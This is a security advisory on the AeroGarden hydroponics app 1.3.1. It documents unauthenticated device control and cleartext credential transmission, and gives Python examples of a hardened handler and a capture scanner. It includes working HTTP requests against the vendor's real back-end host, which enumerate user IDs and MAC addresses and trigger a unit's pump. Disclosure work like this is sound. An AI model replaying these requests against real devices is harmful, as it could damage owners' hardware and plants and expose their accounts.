AeroGarden Version 1.3.1 - Multiple Vulnerabilities
AeroGrow International is a company that produces consumer hydroponic growing hardware for plants (e.g., herbs, vegetables, and flowers). Specific models of their hydroponic growing kits can be controlled with a mobile application. The project's official website is http://www.aerogarden.com. The latest version of the mobile application at the time of this advisory is 1.3.1.
Both identified vulnerabilities would be detrimental to AeroGarden users: an attacker could drive the devices in ways that damage plant life, or could capture traffic and use it to access users' account information.
Severity: Medium (Incorrect Access Controls) and High (Insecure Network Transmission). Note that the second issue's CVSS 3.0 base score of 9.1 falls in the Critical band of the CVSS qualitative scale.
- Incorrect Access Controls: Implement proper access controls for user actions throughout the application.
- Insecure Network Transmission: Enforce the use of secure channels for data transmission.
Jason Gay, Security Associate, Bishop Fox - [email protected]
- 02/20/2019: Initial discovery
- 03/21/2019: First attempt to contact vendor
- 04/17/2019: First contact with vendor
- 07/30/2019: Public Disclosure
Incorrect Access Controls
This version of the AeroGarden application is affected by incorrect access controls. Any user can request information about other users' Wi-Fi-enabled AeroGarden hardware products, and then use this information to change settings (such as water pump run time, light settings, and vacation mode settings). The vulnerability can be exploited by any remote party without authentication.
| N/A | Medium | Incorrect Access Control | Remote |
- CVSS Base Score: 5.3
- CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
By observing the communication between the mobile application and the Amazon EC2 back end, the testing team found that the requests to execute commands on the AeroGarden hardware only required the MAC address (airGuid) of the hardware and the numerical user ID (userID) associated with that hardware. The testing team obtained this information by issuing the following request:
```http
POST /api/Custom/QueryUserDevice HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 12
Accept-Encoding: gzip, deflate

userID=[REDACTED]
```
The response returned the following information:
By iterating through the possible five-digit userID values during testing, the team could retrieve the MAC address (airGuid) of various units not under their control. Only these two pieces of information were necessary to issue commands to the hardware.
With this information, an attacker could issue the following command to turn on the water pump for one minute (the plantConfig parameter is the URL-encoded JSON object {"pumpTest" : 1}):
```http
POST /api/Custom/UpdateDeviceConfig HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 118
Accept-Encoding: gzip, deflate

airGuid=[REDACTED]&chooseGarden=0&plantConfig=%7B%0A%20%20%22pumpTest%22%20%3A%201%0A%7D&userID=[REDACTED]
```
It was confirmed that the unit then ran its pump for one minute. By reviewing the different options within the mobile application, other commands could also be issued to alter the light cycle, set vacation mode, or return the devices to their default settings. An attacker could make the pump motor run until it is damaged, or change options and timing to damage the plant life in the system.
No authentication was required for exploitation.
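The server-side check that is missing here is the one that ties the acting user to a session and the target unit to that user. The following is an added example written for this advisory, not AeroGrow's back-end code: the observed pattern (trusting airGuid and userID from the request body) is modeled next to a hardened handler that takes the user from a server-side session, checks ownership of the unit, and validates the settings. The field names airGuid, userID, chooseGarden, plantConfig and pumpTest are the ones seen in the requests above; the in-memory stores, session tokens, MAC addresses, user IDs and the handler names are assumptions made for illustration.

```python
"""Added example, not AeroGrow's code: the authorization check missing from the
UpdateDeviceConfig / QueryUserDevice pattern, modeled over an in-memory store.
Handlers return (http_status, body) tuples so the two variants can be compared.
"""
import json

# Constructed sample data: two users, each owning one unit, keyed by the unit's
# MAC address (airGuid). All values are hypothetical.
DEVICES = {
    "AA:BB:CC:DD:EE:01": {"ownerId": 10001, "config": {"pumpTest": 0}},
    "AA:BB:CC:DD:EE:02": {"ownerId": 10002, "config": {"pumpTest": 0}},
}
# Server-side session store: opaque bearer token -> authenticated user id (assumed).
SESSIONS = {"tok-alice": 10001, "tok-bob": 10002}

# Settings a client may change and the values accepted for each. Only pumpTest
# appears in the advisory; its accepted values here are an assumption.
ALLOWED_SETTINGS = {"pumpTest": (0, 1)}


def query_user_device_vulnerable(form):
    """Observed pattern: lists any user's units given only a guessable numeric userID."""
    uid = int(form["userID"])
    return 200, [mac for mac, d in DEVICES.items() if d["ownerId"] == uid]


def update_device_config_vulnerable(form):
    """Observed pattern: applies plantConfig to any unit given airGuid + userID.

    No session, no ownership check, no validation of the settings themselves.
    """
    dev = DEVICES[form["airGuid"]]
    dev["config"].update(json.loads(form["plantConfig"]))
    return 200, {"status": "ok"}


def query_user_device_fixed(form, session_token):
    """Hardened: the user comes from the session; a userID in the body is ignored."""
    uid = SESSIONS.get(session_token)
    if uid is None:
        return 401, {"error": "not authenticated"}
    return 200, [mac for mac, d in DEVICES.items() if d["ownerId"] == uid]


def update_device_config_fixed(form, session_token):
    """Hardened: authenticate, check ownership of the unit, then validate settings."""
    uid = SESSIONS.get(session_token)
    if uid is None:
        return 401, {"error": "not authenticated"}

    dev = DEVICES.get(form.get("airGuid"))
    # "No such unit" and "not your unit" get the same answer, so the endpoint
    # cannot be used as an oracle to enumerate valid MAC addresses.
    if dev is None or dev["ownerId"] != uid:
        return 403, {"error": "forbidden"}

    try:
        new_cfg = json.loads(form.get("plantConfig", ""))
    except ValueError:
        return 400, {"error": "plantConfig is not valid JSON"}
    if not isinstance(new_cfg, dict):
        return 400, {"error": "plantConfig must be a JSON object"}

    # Allow-list both the setting names and their values, so a caller cannot
    # push arbitrary keys or out-of-range run times to the unit.
    for key, value in new_cfg.items():
        if key not in ALLOWED_SETTINGS or value not in ALLOWED_SETTINGS[key]:
            return 400, {"error": f"setting {key!r}={value!r} not allowed"}

    dev["config"].update(new_cfg)
    return 200, {"status": "ok"}


if __name__ == "__main__":
    # The request body from the advisory, with placeholder values filled in.
    attack = {
        "airGuid": "AA:BB:CC:DD:EE:02",
        "chooseGarden": "0",
        "plantConfig": '{\n  "pumpTest" : 1\n}',
        "userID": "10002",
    }
    print("vulnerable:", update_device_config_vulnerable(attack))
    print("fixed, no session:", update_device_config_fixed(attack, None))
    print("fixed, wrong user:", update_device_config_fixed(attack, "tok-alice"))
    print("fixed, owner:", update_device_config_fixed(attack, "tok-bob"))
```

The hardened handler ignores the userID in the body entirely; the client never gets to assert who it is, and the combination of a session check, an ownership check and an allow-list on the settings closes both the enumeration and the arbitrary-command paths described above.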
Insecure Network Transmission
The AeroGarden application transmits not only its command execution requests in cleartext, but also the login credentials for the user's account.
- CVSS Base Score: 9.1
- CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
As shown by the Incorrect Access Control issue in this application, network communication between the mobile application and the Amazon EC2 instance occurs over unencrypted HTTP. During testing, the application was observed transmitting login information over this channel, as shown below:
```http
POST /api/Admin/Login HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 61
Accept-Encoding: gzip, deflate

mail=[REDACTED]&userPwd=[REDACTED]
```
An attacker able to capture this traffic (for example, on the same Wi-Fi network as the phone) could log in to the user's account on the AeroGarden website and access personal information such as address and payment details, depending on whether the user has saved this information to the site.
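Finding this class of issue in a traffic capture comes down to checking whether parameters that should never be readable on the wire appear in request bodies that are readable. The following is an added example, not part of the advisory or of Bishop Fox's tooling: a small parser for captured HTTP/1.1 requests and a scan that flags form-encoded bodies carrying the credential and device-control fields named above. The host, paths and parameter names follow the requests in this advisory; the sample captures and the placeholder values in them are constructed.

```python
"""Added example, not the advisory's tooling: scan captured HTTP request text for
credentials and device-control parameters sent in cleartext.
"""
from urllib.parse import parse_qs

# Fields that must never be readable on the wire. mail, userPwd, userID and
# airGuid are the parameter names seen in the advisory's requests.
SENSITIVE_FIELDS = {
    "userPwd": "account password",
    "mail": "account email",
    "userID": "numeric user id",
    "airGuid": "unit MAC address",
}


def parse_http_request(raw):
    """Split one captured HTTP/1.1 request into (method, path, headers, body).

    Header names are lower-cased; a capture that was re-saved with bare LF line
    endings is accepted as well as the CRLF form the wire uses.
    """
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, path, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def find_cleartext_secrets(raw_requests):
    """Return one finding per request whose readable form body carries a sensitive field.

    Anything that can be parsed out of a capture was, by definition, not protected
    by TLS, so the check is simply: form-encoded body plus sensitive parameter names.
    """
    findings = []
    for raw in raw_requests:
        _method, path, headers, body = parse_http_request(raw)
        if "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
            continue
        params = parse_qs(body, keep_blank_values=True)
        exposed = sorted(name for name in params if name in SENSITIVE_FIELDS)
        if exposed:
            findings.append({
                "host": headers.get("host", ""),
                "path": path,
                "fields": exposed,
                "why": [SENSITIVE_FIELDS[name] for name in exposed],
            })
    return findings


# Constructed captures modeled on the advisory's redacted requests. The
# credentials, user id and MAC address are placeholders, not real values.
SAMPLE_CAPTURE = [
    "POST /api/Admin/Login HTTP/1.1\r\n"
    "Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)\r\n"
    "\r\n"
    "mail=user%40example.com&userPwd=hunter2",

    "POST /api/Custom/UpdateDeviceConfig HTTP/1.1\r\n"
    "Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "airGuid=AA%3ABB%3ACC%3ADD%3AEE%3A02&chooseGarden=0"
    "&plantConfig=%7B%0A%20%20%22pumpTest%22%20%3A%201%0A%7D&userID=10002",

    # A body-less request: parsed, but produces no finding.
    "GET /api/Custom/Ping HTTP/1.1\r\n"
    "Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080\r\n"
    "\r\n",
]


if __name__ == "__main__":
    for finding in find_cleartext_secrets(SAMPLE_CAPTURE):
        print(f"{finding['path']}: {', '.join(finding['fields'])} readable in cleartext")
```

The same scan runs unchanged over requests exported from a proxy or from a packet capture, and a fix on the client side is verified the same way: once the application talks only to an https:// endpoint (and, on iOS, no App Transport Security exception is granted for the host), the capture contains no parseable form bodies and the scan returns nothing.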